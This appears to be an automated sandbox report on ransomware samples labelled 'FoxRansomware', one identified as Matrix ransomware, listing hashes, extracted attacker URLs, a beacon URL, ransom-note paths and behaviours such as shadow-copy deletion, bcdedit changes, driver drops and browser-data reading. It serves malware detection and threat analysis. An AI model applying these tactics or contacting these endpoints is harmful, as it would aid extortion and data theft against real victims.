Overview
overview
10Static
static
3FoxRansomw...65.exe
windows7-x64
10FoxRansomw...65.exe
windows10-2004-x64
10FoxRansomw...a7.exe
windows7-x64
10FoxRansomw...a7.exe
windows10-2004-x64
10FoxRansomw...20.exe
windows7-x64
10FoxRansomw...20.exe
windows10-2004-x64
10FoxRansomw...0b.exe
windows7-x64
10FoxRansomw...0b.exe
windows10-2004-x64
10FoxRansomw...53.exe
windows7-x64
10FoxRansomw...53.exe
windows10-2004-x64
10FoxRansomw...b1.exe
windows7-x64
10FoxRansomw...b1.exe
windows10-2004-x64
10Analysis
-
max time kernel
151s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
13-02-2024 05:15
Static task
static1
Behavioral task
behavioral1
Sample
FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral3
Sample
FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
Resource
win7-20231215-en
Behavioral task
behavioral4
Sample
FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral5
Sample
FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
Resource
win7-20231215-en
Behavioral task
behavioral6
Sample
FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral7
Sample
FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
Resource
win7-20231215-en
Behavioral task
behavioral8
Sample
FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral9
Sample
FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
Resource
win7-20231215-en
Behavioral task
behavioral10
Sample
FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral11
Sample
FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
Resource
win7-20231215-en
Behavioral task
behavioral12
Sample
FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
Resource
win10v2004-20231215-en
General
-
Target
FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
-
Size
1.2MB
-
MD5
c82d64850d35cc6a536c11adbd261cf6
-
SHA1
9f4d070a1b4668d110b57c167c4527fa2752c1fe
-
SHA256
941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1
-
SHA512
777a06d73e70a881d5b3872236ba8b53aa4d42f94ad247c109980847ccd6d0c531d30afef10315d7b5fe70c7fe4496f932aaac41f6aec76e98474c44bb781002
-
SSDEEP
24576:pLeb4QFvTn5TuJR5ezGPMy4EnBBuKfDW:Qb/GMef
Malware Config
Extracted
http://myexternalip.com/raw
Extracted
C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.0\#KOK8_README#.rtf
https://bitmsg.me
https://bitmsg.me/users/sign_up
https://bitmsg.me/users/sign_in
Signatures
-
Matrix Ransomware 64 IoCs
Targeted ransomware with information collection and encryption functionality.
Processes:
941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exedescription ioc process File created C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\hrtfs\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\es_419\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ca\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\Videos\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\kk\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\ms\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\en\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick.2\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe HTTP URL 1314 http://fredstat.000webhostapp.com/addrecord.php?apikey=kok8_api_key&compuser=EUCQOBEO|Admin&sid=nrXNNWlZfCOPOX8L&phase=[FIN]248A5E34402C23D6|3128|171|3299 File created C:\Program Files\VideoLAN\VLC\locale\hy\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\tg\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\be\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\de\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\OneNote\16.0\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\OneDrive\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\it\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\Settings\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pt_PT\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\kok\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\sr\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pl\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\amd64\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jre-1.8\lib\deploy\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ro\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\ProgramData\Microsoft\ClickToRun\ProductReleases\0BC38F05-20C0-4D3A-8C7C-72786C413F21\en-us.16\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\logs\setup\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\ProgramData\Microsoft\ClickToRun\ProductReleases\0BC38F05-20C0-4D3A-8C7C-72786C413F21\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ja\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cookie\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Google\Chrome\Application\106.0.5249.119\VisualElements\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\Settings\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\Settings\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sl\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\pa\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\security\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Mozilla Firefox\defaults\pref\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\106.0.5249.119\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\vi\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\zh-TW\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ja\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\mn\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sq\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{c660b1c0-c235-48ef-8938-8044ed0eb592}\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Cache\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\ja\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\EILXGZR0\2\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\pt-BR\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\el\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\tn-ZA\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jre-1.8\lib\cmm\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ky\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\ProgramData\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 5168 bcdedit.exe 5432 bcdedit.exe -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 152 4308 powershell.exe -
Drops file in Drivers directory 1 IoCs
Processes:
FCcth9iY64.exedescription ioc process File created C:\Windows\system32\Drivers\PROCEXP152.SYS FCcth9iY64.exe -
Sets service image path in registry 2 TTPs 1 IoCs
Processes:
FCcth9iY64.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS" FCcth9iY64.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
wscript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\International\Geo\Nation wscript.exe -
Executes dropped EXE 64 IoCs
Processes:
NWVcqERC.exeFCcth9iY.exeFCcth9iY64.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exeFCcth9iY.exepid process 1572 NWVcqERC.exe 5916 FCcth9iY.exe 3680 FCcth9iY64.exe 544 FCcth9iY.exe 1012 FCcth9iY.exe 5900 FCcth9iY.exe 1476 FCcth9iY.exe 4388 FCcth9iY.exe 5568 FCcth9iY.exe 5508 FCcth9iY.exe 6128 FCcth9iY.exe 4296 FCcth9iY.exe 820 FCcth9iY.exe 5632 FCcth9iY.exe 5256 FCcth9iY.exe 4684 FCcth9iY.exe 5656 FCcth9iY.exe 2216 FCcth9iY.exe 4468 FCcth9iY.exe 3104 FCcth9iY.exe 3560 FCcth9iY.exe 5972 FCcth9iY.exe 5456 FCcth9iY.exe 6096 FCcth9iY.exe 5704 FCcth9iY.exe 4356 FCcth9iY.exe 5432 FCcth9iY.exe 2564 FCcth9iY.exe 5648 FCcth9iY.exe 4848 FCcth9iY.exe 1580 FCcth9iY.exe 5268 FCcth9iY.exe 4468 FCcth9iY.exe 5840 FCcth9iY.exe 2316 FCcth9iY.exe 3864 FCcth9iY.exe 5200 FCcth9iY.exe 5836 FCcth9iY.exe 5568 FCcth9iY.exe 5320 FCcth9iY.exe 5908 FCcth9iY.exe 3556 FCcth9iY.exe 3492 FCcth9iY.exe 5992 FCcth9iY.exe 3660 FCcth9iY.exe 5440 FCcth9iY.exe 3276 FCcth9iY.exe 5160 FCcth9iY.exe 668 FCcth9iY.exe 5572 FCcth9iY.exe 2736 FCcth9iY.exe 928 FCcth9iY.exe 5216 FCcth9iY.exe 5712 FCcth9iY.exe 5036 FCcth9iY.exe 5156 FCcth9iY.exe 716 FCcth9iY.exe 5576 FCcth9iY.exe 2292 FCcth9iY.exe 5480 FCcth9iY.exe 4664 FCcth9iY.exe 5464 FCcth9iY.exe 5428 FCcth9iY.exe 3140 FCcth9iY.exe -
Modifies file permissions 1 TTPs 64 IoCs
Processes:
takeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exepid process 448 takeown.exe 856 takeown.exe 5112 takeown.exe 4164 takeown.exe 4772 4432 6072 5848 takeown.exe 5400 1832 4736 takeown.exe 5556 takeown.exe 6020 takeown.exe 2228 4460 708 5360 takeown.exe 5420 takeown.exe 5156 takeown.exe 4984 2184 4508 4212 takeown.exe 4136 5900 5600 takeown.exe 4692 3040 takeown.exe 612 takeown.exe 3716 4328 1328 5232 takeown.exe 2992 5776 1328 5656 takeown.exe 5180 takeown.exe 5984 takeown.exe 5576 takeown.exe 5988 takeown.exe 1524 5908 takeown.exe 2564 takeown.exe 280 takeown.exe 5356 takeown.exe 2168 takeown.exe 5528 takeown.exe 6036 takeown.exe 4684 takeown.exe 5052 takeown.exe 5528 5708 takeown.exe 5840 takeown.exe 856 takeown.exe 5600 takeown.exe 4200 takeown.exe 4392 takeown.exe 5176 takeown.exe 3984 1944 takeown.exe 5504 5176 3540 takeown.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exe upx behavioral12/memory/5916-1983-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/544-4178-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/1012-4180-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5900-4317-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/1476-4348-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/4388-5382-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5568-5384-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5508-5654-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/6128-5716-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/6128-5717-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/4296-5870-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5916-5872-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/820-5971-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/820-5983-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5632-6087-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5256-6091-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5256-6092-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/4684-6202-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5656-6234-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/2216-6343-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/4468-6355-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/3104-6403-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/3560-6421-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5972-6480-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5456-6482-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/6096-6484-0x0000000000400000-0x0000000000477000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exe upx behavioral12/memory/5704-6488-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/4356-6578-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5432-6580-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/2564-6725-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5648-6727-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/4848-6731-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/1580-6733-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5268-6735-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/4468-6737-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/4468-6738-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5840-6742-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/2316-6744-0x0000000000400000-0x0000000000477000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exe upx behavioral12/memory/3864-6746-0x0000000000400000-0x0000000000477000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exe upx behavioral12/memory/5200-6748-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5836-6752-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5568-6754-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5320-6756-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5908-6758-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/3556-6762-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/3492-6764-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5992-6766-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/3660-6768-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5440-6773-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/3276-6775-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5160-6779-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/668-6781-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5572-6783-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/2736-6785-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/928-6788-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5216-6793-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5712-6795-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5036-6797-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5156-6800-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/716-6801-0x0000000000400000-0x0000000000477000-memory.dmp upx -
Drops desktop.ini file(s) 27 IoCs
Processes:
941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exedescription ioc process File opened for modification C:\Program Files (x86)\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Libraries\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Music\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\OneDrive\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\AccountPictures\desktop.ini 